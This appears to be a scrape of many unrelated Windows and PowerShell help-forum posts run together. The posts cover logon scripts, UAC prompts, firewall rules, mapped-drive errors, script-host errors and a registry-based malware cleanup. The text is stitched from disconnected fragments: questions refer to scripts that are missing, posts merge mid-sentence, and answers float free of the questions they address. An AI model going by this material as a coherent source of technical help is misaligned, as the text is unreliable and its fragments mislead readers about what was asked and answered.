Question: Eding my powershell script or jumping to another location

i am trying trying to have my powershell script say "ok, computer will restart now" after user inputs a y after they are aked if they would like to reboot.and it just jumps right by it and says "OK... computer will NOT be restarted. Also if the use hits enter to any of the first 3 questions i want all the parameters to stay the same. below is the script i have so far. can anyone help. You will have to excuse me if this is a dumb question. I just started learning powershell.

Question: Powershell Script

Hi, I am running a logon script that elevates to run as admin. But users get the popup message every time they log in.

Is there way to add the script as trusted so once a user clicks yes it adds as a trusted script and runs every time without the UAC popup thereafter. Thanks

Background: I have some text files I want to copy only specific text from. Can I start and stop with certain identifiers within the file?

The files I need to split have a heading and footer with a bunch of *s. Is there any way I can look for a specific number of *s and tell the script to copy everything between the header and footer?

They're not a header and footer per se, but these *s surround the data which I actually want.

Hi,

I have this powershell script that keeps on saying the length of the SID is wrong, or that I have invalid chars in the SID. The script is supposed to add an outbound firewall rule which blocks all traffic from a local user . The environment is Windows 10. Just change the username 'owner' to any user name on your system.

I have to use Powershell because in their command it has the 'localuser' option, which is not available when using 'netsh advfirewall', the command line tool. Apparently netsh is not going to be updated anymore, and Powershell is the way forward.

I am trying to clean an infection on a computer.  I have removed everything but this.  Every time I reboot.  I get a powershell window open with a bunch of numbers in it.

First let's attempt to remove the registry key that causes that powershell windows to open:
 
1. Press the Windows key and the "R" key at the same time, and then type this in the window that opens: regedit

 
2. Windows registry editor will open. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, using the menu on the left. If you do not know how to use regedit, here's a guide. However, it's really simple and I doubt you need a guide
 
3. When you're there, on the right side of the screen, find the item which "data" begins with cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, and right click and delete it!
If it's not there, please check if it's in  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, and delete it.
Warning: only remove that item I mentioned! Don't delete anything that isn't in those two locations, and which data doesn't start with cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
 
Now the powershell shouldn't start when you boot the PC. However, your PC may still be infected.
You know how to run Malwarebytes, so please do a scan and remove the malware it finds. If it asks you to restart the PC, say "yes". Then, open Malwarebytes, select the "History" tab on the top, click the most recent "scan log", and on the window that opens, on the bottom, click "export --> copy to clipboard" and paste it here.

Here's the thing. My system is an age-old i3-530 overclocked to 3.5GHz coupled with GTX 1050 2GB. I have around 1.5TB of tutorial videos that I have to encode due to dearth in HDD space. I want to encode the videos while keeping the folder and subfolder structure intact.

Here's the problem though. Since my system is overclocked, I sometimes get

with IFME. And when I run Handbrake GUI, sometimes it stops working. The difference is that in case of IFME, the incomplete file is in a

folder, whereas it's pretty darn hard to differentiate between an incomplete and a complete output of HandBrake.

Hello,
I need to make an installation script for Messag Analyzer 1.4. After installation, the welcome screen, updates, user contact and Telemetry should be disabled. I don't find any installation switches to do that. I've found that app.applicationconfiguration
is used to store those configurations but it is created after I manually do the configuration.
I'd like to disable these parameters during installation. I don't want the users manually configure these settings.
Can you help me with that issue please?

Ok, so this doesn't necessarily have to do with Windows 7, but I originally wanted to reply to a post on Vista forums and somehow I ended up here. Anyway...

I actually tried all of this on Windows Server 2008 - set policies, scripts and logged on there.
Here's one way that actually works. 1) created a logonScript.ps1 file with whatever in it for the actual logon script. 2) created GPO with a policy for running a logon script and specified a vbScript file: launcher.vbs. 3) put those two files in the same folder related to the policy if you know what I mean.
The launcher.vbs contains:

So for example a room would be in D block and the room number would be 6. We also have 'test' accounts which we deny access to Internet and other such things. What I would like to know is how would a script work to login each computer as a test user on each computer in D6.

Hello, I have a PowerShell Script I would like to run at any user logon. I have set task scheduled to run the script. But the message the script is to pop up is not showing. Does anyone have any ideas about why the pop up message in the scheduled script
is not showing?
I will add that the script does work. I can run the script and the message pops up. But, trying to run it from the task scheduler, nothing happenings. The Task Scheduler last run result, says completed successfully. But still the message does not show.

This script does not work.

The poster on another fourum said it could be a typo or something, but no further info was provided what the correct script is, although he had no errors, he mentioned it could be environment, I'm on win7 x64.

I have another similar script for filenames in a txt only, which appears to work, but it doesn't work because I have filespath in the txt, in the meantime i'll manually remove paths to see if it'll work with that, but still this script would be handy to save time in future.

Hello, I need help in setting bios settings remotely to 1000+ computers. I have a problem where I have computers with two different passwords. I came up with PowerShell script but the two passwords don't work in conjunction together. Can you please help with the scripts. I am googling scripts to find a PS script to count file types and files in several directory's on our network.
I am a noob on powershell, and I'm trying to experiment.
I have several directory's on my "Libraries" directory on my pc at work. I'm just trying to test a PS script to get this to work to count the files and list the file types in my "Libraries\Documents\Tidbits" folder.

Hi,
I need copy files from one(source) server to another(destination) server and want to log an event in case any failure happens for example if destination server is not available.
I have tested the following command in a powershell script and its just working fine for copy to destination and then moving the files to archive. 

Copy-Item "c:\copy\*" -Destination "\\server1\d$\testcopy" 
Move-Item "c:\copy\*" -Destination "c:\Archive" 


Please advise how can i log event in eventviewer in case of error or if script is not executed.

This is my first post and I hope it is in the right place. I have an Inspiron 6000 laptop and xpmediacenter edition with ms office suite, paintshop prox. My problem is that when I type, the letters are suddenly in a different location either on the page or a different place on the website. It doesn't matter what program I am or if I am on the internet. I literally have to click in place I need to be to continue. I have run spybot, zone alarm pro anti-virus and spyware and mcafee is also on my computer. Dell says it is a software problem and won't help. It was suggested that it was a spyware (the reason I have run spybot, etc) Can someone help me or suggest where I can get help?

Hi all,

I'm trying to make a batch or powershell file that will call multiple names and passwords from a CSV file and then create local users with them.

Anyone able to help? - I've made users in command line before using the Net User command, but i'm not sure how to use the variables to say read the data from this spreadsheet, then add a user with it.

Any help would be gratefully received!

Wondering if anyone in this forum can help me figure out what I am doing wrong with my script. I am grabbing a text file with a list of users in it. I want to then create folders for all those people and then set explicit permissions on those folders to only allow the users and admin access to it. So for the create user folder, I have...

Hello.

I'm struggling to create a private key in order then to use to sign a PowerShell Script and I would really use some help on this.

Firstly I wanted to be able to run PowerShell scripts without having to lower PowerShell's Execution-Policy and in order to do that one should have to be able to sign scripts.

Therefore and after installing the [URL="https://www.microsoft.com/en-us/download/details.aspx?id=8442"]Windows SDK[/URL] I'm trying to create a private key (and then a certificate) in order to be able to sign scripts.

But this fails likewise:

Hi,

I am trying to uninstall RSAT tools from my Windows 8.1 client. I'm getting the error linked below on API and Powershell cmdlets component.

I already have restarted the pc, run the dism /online /cleanup-image /scanhealth and /restorehealth, tried to delete the reg key that cbs.log tells to not be able to delete itself (in this case the error is "cannot find" instead of "cannot delete").

I work in an enterprise environment, where I manage a lab of 75 computers. I use Ghost to image and then I walk the computers afterwards to change the PC names and SIDs.

I am implementing a script to automatically add the computers to the domain but I am new to PowerShell and would really appreciate the help. Here's the script I'm using, 1.ps1:

I've been trying to set the company I work for up with a standardized Outlook signature. I found a great Powershell script to take care of it. Here's a pastebin of the entire script. Well, I've set the script up and have it run by a logon batch file set to run in each user's Active Directory profile. I figured we were using one anyway, so might as well just add to it for this functionality. Well, the batch file loads the script every time without fail, and the script is capable of working, but doesn't always. While testing I restarted/logged in and out several times to make sure the script was doing it's job. I didn't change the logon batch file, and I didn't change the Powershell script. Well, sometimes the script works and Outlook applies an accurate new signature to my emails with information pulled from AD just like it should, and sometimes it doesn't. When it doesn't, the error I get is:

Hello,

User A experiences a logon script every time he logs his machine. This particular logon script is old and I want to get rid of it but I can't seem to locate it. Here are some details:

Script follows user when he logs into other machines on the network so I know it is not local to his primary machine.
Script is not located in AD\GPO in either computer(Scripts:Startup/Shutdown) or user(Scripts:Logon/Logoff) setting locations.

As the script follows the ueser on the network no matter what machine he logs on says its roaming profile, so the script would be located on the network server with the users profile. HAve a read of this

I am looking for the location for the windows logon script file. I need to compare two script files
The issue that I am having is that one laptop is not automatically mapping network drives even though the user is in the correct active directory group.
Another user is in the same group and has the network drive mapped, so I need to compare both logon scripts from both laptops.
Maybe these scripts can be read or edited in notepad but I need the location if anybody can help?

Hi! I currently inherited a Windows 7 image that has the default location for the users' My Documents folder configured incorrectly. When a domain or local user account logs in to the machine for the first time the Documents directory, which by default should be located on %userprofile%\Documents and C:\Users\Public, is being set to point to the "My Documents" SHORTCUT folder and not the actual Documents folder inside C:\Users\%username%\. See screenshot.

I'd like to fix this by running a script that will remove both directories and only specify C:\Users\%username%\Documents as the only and default My Documents directory for the user.

Unfortunately, doing this via Group Policy is not an option. And since the image I am using was created by a previous technician I couldn't just create a new image since there are tons of software and customization already incorporated on it. I also tried exporting and importing the registry key for it on the explorer shell but that only seemed to work for the user where I exported the key from.

It would be nice if I have a more permanent fix for it so any new user logging in would have the correct path already set instead of me running a script for every user to fix it but if there's a simply and quick script to do it I can live with that.

I am writing a VB script to find the list of missing windows updates on the windows system in offline mode. Means i will provide path of wsusscn2.cab file in VB script and fetch various parameters like Title,Type,Severity,download url link etc. I can find
list of missing updates and their names using the script but it is always giving the URL link pointing to .cab file only even though we have same KB with extension .msu is available in microsoft catalog update website. My scope of work is to find the respective
missing KB file with .msu/.msi extension and display it in the script. But my script always fetching .cab extension updates only but not both .cab and .msu for same KB even though both found in windows updates website.

Hello everyone. I joined the forum today and hope you can help me out. On my work desktop I am running Windows 7 and I want to upgrade PowerShell version 2.0 to 4.0 as a minimum or 5.0. I've read many articles on fixing Windows PowerShell issues but my case seems to be a little different.

I've done searches for it on my computer and came up empty. Powershell does not show up in my "All Programs" list, Program Files / Program Files (86) or its Common Files, or in the local or roaming user files. The only place I see remnants of it such as the powershell.exe file is within C:\Windows\winsxs\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_7.3.7601.933_none_3989ef6dcae7e4a9 and a few other folders like it within the winsxs directory. I have an external USB GPS receiver for my Laptop. I have also noticed that if I use the Internet Sharing feature to give Internet to my laptop, then it will pick up my correct location from my phone's GPS.

OK, I've googled and searched for this as much as I can. I'm a new Windows 7 user. I have a library (Documents) with three folders included. Call them folders A, B, and C. I understand how to set the default save location. Let's say I've set it to Folder A. Now, I want to save a file in *Folder B* by using the convenient Libraries button. Let's further say that Folder B is the location "C:\FolderB". It seems that IF there is a subfolder, say "C:\FolderB\test", I can save it there by clicking Libraries, expanding FolderB, and double clicking on "test". HOWEVER, if C:\FolderB has no subfolders, I can't seem to save there by using Libraries.

That is to say: IF you have a folder in your Library that is not the default save location AND that folder has no subfolders, there's no way to save there by starting from the Libraries button. Answer:Saving to a library location that is NOT the default save location

I might be missing your intended idea, but if you name the folder, such as "Test B", then you should be able to save the .ext (if named) to that particular folder by clicking on the "C" drive... wait for it (the drive) to show up, then save.

If you name a .txt file (or another extention) and save it to your desktop, you can also move it to that named folder on "C" drive.

Just curious as to why you want to have different named folders on "C" drive when you can use the Documents folder?

Greetings! I tried to search for posts on my issue but all that comes up is advice on how to move your Documents folder. I already did that. I changed my location from my SSD C:\ drive to my data drive E:\. Everything seemed fine until today when I navigated to the E: drive with Windows Explorer. My documents and music folders somehow got moved to a "Videos" folder. The "Gary" folder appears to be gone. However, the Documents shortcuts still work. In fact, the location property for Documents shows the correct (old) path but when I click on Find Target, it takes me to the Videos folder. I'm not sure when this happened. I have a system image but I'm afraid it was created after the fact. (Yes, I have rebooted)

You can press the Restore default button (changes it back to C:\Users\Gary\Documents) and then perform the move again to the location of your choice. Answer yes to move files if prompted.

I keep getting the error "Location is not avalable F:\ refers to a location that is unavailable........" in windows 7. Sometimes it shows as "SYSTEM (F) and other times as a picture of a drive with a question mark over it ans F:\. I have done a check disk and the command prompt "gpupdate /force" as suggested on a site but no luck.

I have looked at other solutions but nothing seems to pertain to my specific problem. Any help will be appreciated. I have attached screenshots.

I already tried to scan my computer with avg anti-spyware but i can't save the report. Windows Script Manager can't find it because I blew it out of the godamn airlock!

He, he, he.

Short verison, my nephew was visiting for a few months earlier this summer. After he left, I discovered he downloaded and ran a lot of porn and IMVU on my computer plus other junk (can't remember what all he did, and he tried to delete some of it on his own; bottom line, I have no clue what all he did).

I tried to use the uninstall on everything and thougth I got it all, but then noticed that my CPU was constantly running. I opened task manager and found that java SE was constantly running, using up 25% of my CPU.

I tracked down what that was, using control panel and CCleaner startup tab. Tried to delete command strings etc. but that didn't work; it would just re-insert itself!

Found the .js file through a hard-drive search, then just deleted the whole damn thing.

Now everything on my system seems to be running fine. Java only runs when I want it to, nothing not accessable ... except ...

On every startup, I get the message from Windows Script Manager. I click the "ok" box for the notice and it goes away. Anoying the crud out of me.

See attached malware scan logs. I see it right there on the RogueKiller log, but the instructions said not to do anything but get the log, so I didn't try to "fix" it with that program.

I am using Windows 10 Home on a HP i3 laptop.

Just recently I have started receiving an error pop-up which says "Windows Script Host - There is no script engine for file extension ".js"".

There doesn't seem to be a pattern to when the error appears, but it is quite frequent.
I found one Windows 10 online post which said that I needed to have java installed. I can confirm that java is fully installed.
I have found other forum posts which relate to version of Windows before Windows 10 but none of these help.

Can anyone shed any light onto what this error might be with Windows 10?.

Here is my Hijack this log file. I did everything listed but I am having issues with the way pages load or don't load properly while on the internet. Cannot read the words very well, sometimes they are overwritten , sometimes they are huge or the writing is too thin to be read easily. For example, when I load a newpaper like NY Times, the columns are squeezed in the middle of the screen and isn't displayed so it is readable columns overlap and words and photos overlap or are sqeezed into a narrow column. I have downloaded new drivers for the display, played with display properties and cannot seem to find the problem. Wondering if it is a bug or virus or worm or something. I am really not a geek, so I need help. I don't know how to mess with registry things, so I use Registry Mechanic. But it has not fixed this problem. I get runtime error codes and it asks me if I want to debug... mostly script errors. I ahve no clue about debugging, so I don't do it. Anyhow, any help would be appreciated!!!Thanks! We'll be doing the low-voltage for our new location shortly. I'm going to use a small 8U cabinet that i've used before to put the patch panel, switch and router in ( see pic below ):

Since the location is fairly small ( 25 feet wide by 100 feet long ) we don't have a lot of extra space around to dedicate to a network closet. We have fairly high ceilings in our office 'pit' area ( 13' ) and we were thinking about mounting the cabinet ~8-10ft high to keep it out of the way. The good part about this is the wall we want to mount on is permanent (part of the building structure). See below picture for construction photo:

The bad part about this, is restarts or service work needs to be done on a ladder (inconvenient).

Is there any other reasons why i shouldn't mount the cabinet so high (besides inconvenience) that someone can talk me out of?

I have a network drive mapped to Z:. I can see all the files and folders on it in windows explorer. I can create new folders and files on it and read from it but when I try to copy files to it from my C: drive it says:

"Location is not available - Z:\ refers to a location that is unavailable. It could be on a hard drive on this computer or on a network. Check to make sure that the disk is properly inserted or that you are connected to the Internet or your network, and then try again. If it still cannot be located the information might have been moved to a different location."

Why? I can see it right here in windows explorer. It's so annoying and of course it makes me type in my administrator password before it pukes out the error. What can I do to fix this and yes I've rebooted my computer. It has worked in the past all of a sudden it starts doing this? I've disconnected and remapped network drive and rebooted in between doing those too but no change. Any ideas?

I'm currently trying to use my LG Rumor 2 to act as a modem for a dialup connection with my bluetooth capable computer. Everything is working great but my university, which I'm trying to connect to, requires a ppp script setup and I need to use the terminal window. So the computer dials correctly and everything works but when the terminal window appears I can't type anything although the text field appears for the username. Also, within a few seconds of the terminal window appearing I get the error "The Script has Halted." I can however right click and paste in text (but i don't know if that's relevant). just finished formating my computer (using the built in windows 8 feature). once it was up and running i uninstalled all the built in stuff lenovo brings with the computer using revo uninstaller. in the procces i also removed all registry and files those programs left.. but now theres a probelm:

this pops up every once in a while. usually when i install something. note that this is just one messege out of two! the other one looks the same but reffers to a different file - Lenovo-25207.vbs which sits in the same folder.

any ideas?

Right click the .vbs file - open with notepad - check the second line for a file/folder reference - and then see whether that file/folder exists....

It has been a while since I have been on here. I have had a few computer problems that I had to work through, and once again I had to do a Factory Condition System Reset. The second time in jut over a year. They did not know what was causing my problem. I talked to both Dell; my computer manufacturer and Microsoft who made Windows Vista. They boh could not figure out what was causing my problems. Microsoft recommended to go to my computer manufacturer. And Dell just said to do the complete System Reset, Also Known As: Factory Condition Restore.

Back to my questions about Script debugging and Script errors. Every once in a while I have Windows notify me of the Script errors. Also sometimes when I go to view a webpage or enter a website a message will pop-up saying that a script error occured that could prevent me from viewing the page properly and asks me if I want to continue. I do have: "Disable Script debugging?" checked for both "Internet Explorer" and "Other". I also get a little note in the lower left hand corner saying: "Done, but with errors on page."

My first question is: What the heck is Script debugging?

Second question is: What can I do about the Script errors that occur?

Third: Why do script errors occur or what causes them? I know there can be millions of reasons that they occur, but what are the most common ones?

I am constantly (like a half hour doesn't go by) getting the script messages. The script has stopped working or the script is busy. I don't know what causes it so much. I click on debug script, but I don't understand what the debugger says or how to tell how long to wait. I just don't understand anything about this at all plus why it happens so much. Please help!

After reading for a while I got to the conclusion that the problem is related to Kaspersky

I already tried to re-register

Is Kaspersky working or not working? If you are getting a VB Script error, either something was removed in error, or you have the OS locked down too tightly with the A/V software.

In Windows Explorer: Open a .jpg file from anywhere in my file system, by right mouse clicking and choosing "edit"After editing: "Save as" (press F12) and save the edited file IN ITS ORIGINAL LOCATION but under a different name.
Now, in Windows 10, the situation is different:

I just right clicked on an image file here and chose the Edit option and the "save as" to save the jpeg file with the word "duplicate" added into the file name to save it in the original location. You may want to try starting with the Paint app first you find in the Start>AllApps>Windows Accessories list and then simply choose the open option in the file menu to browse to and select the intended file. You can also see that pinned to the Start menu as well as to the main taskbar with a fast right click.

If your copy of 10 was an upgrade install that might explain the problem you are seeing since the upgrade install tends to not see everything go on fully at times. The word "Buggy" tends to fit the bill for that type of install and not specific to 10 only but every version coming up from Legacy to 9x onto ME, 2000, XP, Vista, 7, 8, 8.1, and now 10.

The one thing favored with having the Windows Photo Viewer restored replaced by Photos in 10 is that once you have any image or photo in view you can simply to upto the menu and select the "Make a copy" option and browse to the location you want the new copy to be created and saved to on the spot.

Ive been beating my head around this problem.

Question: PowerShell Help

Edit: Figured it out. On the remote chance someone else runs into this, it was due to "set-content *.sch". That was occurring once per .sch file. I changed it to "set-content $file" and it works fine.

I am trying to write a script that imports a text file, adds a specified number to a value in the third column, then writes the new data to the same file.

This works fine when there is only one .sch file. When there are several .sch files, the $offset value of 12 is multiplied by how many files there are. Meaning, if there are six files, it will properly edit all six but the third column will be incremented by 72 instead of 12. I imagine it is actually running 6 times per file, instead of once.

I'm sure there's a simple fix for this, but I cannot find anything. Any tips?

I'm not sure what you're trying to do with the $dir*$station*.sch. Are you trying to use pattern matching to get everything in a directory that matches *test*.sch?

If that is the case, try this:

Too many loops to make too much sense out of it without seeing the file.

Look closer at this line and run it through the ISE debugger.

Looks like you're adding a property of .c to the object in the pipeline, then adding $offset to it. If that ever loops more than once, it's going to start adding $offset multiple times.

i thought windows 7 pro comes with powershell 2 installed....
when i look in sys32 folder it shows powershell 1... also when powershell is activated it is version 1.... is this correct or what is going on... system is fully updated... win 7 pro 64 bit

Hi,

I was thinking of making a script for powershell, but it was harder than i thought. I'am a beginner of the beginners when it comes to powershell, so i was wondering if any of you could help me (or maybe make me one) with making one.

This is what i was thinking of(not sure if this is even possible):

When you start powershell you get this line:
"Please type the direction of which folder you want to see a acces list, then press enter"
Example: c:\myscripts <ENTER>

"Please type the folder of where you want to save the .xls file. then press enter"
Example: c:\myscripts <ENTER>

Then i want the possibility to have powerpoint saving the acces list as a excel file in the folder which has been selected.

I've been looking for scripts for the past 3 days, but unfortunately i havent found anything.

I'm trying to run a powershell command that will query all mailboxes for some specific text and to log it on Office 365.

The script used to work when when the environment was first setup, but i believe its stopped work now because there is too much data to look / output now.

I encountered an issue this morning where the bossman wanted to know which servers in our domain were running 32-bit versions of Windows Server. Thankfully, he was asking a different admin, but I decided to try and tackle it on my own as well. The objective was to find every machine on our domain with "Server" in the OS version, and then I'd need to look at those machines and find the 32-bit versions. Well, Get-ADComputer can return the OS Version, but it can't tell if the machine is 32-bit or not. Get-WMIObject Win32_Computer_Sytem can tell me if the machine is 32-bit or not, but it can't tell me if it's running Windows Server. So, I wrote up a quick powershell script that would execute two commands, and combine the outcome. Unfortunately, I seem to have hit a wall, and I'm not sure what's going on. To test out my scripts, I queried a block of computers which by name. Everything worked out great. I then tried to find computers based on OS Version instead of name. RPC failures everywhere. If I run the same command outside of the script, targeting a specific machine, it works great. This tells me that there's no firewall issues, etc. The command works... When not put in a script. What gives?

Hmmm, not sure why yet, but it only breaks when you try to put it into the $GetInfo variable. Running without '$GetInfo =' it works just fine. Need to play with this some more to see what's going on here.

I was building script in power shell and every time I run it power shell told me I have to save it. It was starting to annoy me so check the box where it says "Dont ask me again". I am regretting that now because I have inadvertently over written some code that I cant get back. dDes anyone know how to turn this feature back on.

I have a 64-bit laptop running Win 10 Home.

I just notice in All apps, there is an entry of PowerShell and PowerShell (x86).
I realize the former is for 64-bit and the latter is for 32-bit.

Question :
In my 64-bit laptop, when I open PowerShell, which one am I actually using ?

example : If I go ...........
Elevated command prompt > Powershell
Which one will that be ? 32 or 64 ?

Assuming I can use both, is there a circumstance that I must use the 64-bit PowerShell ?
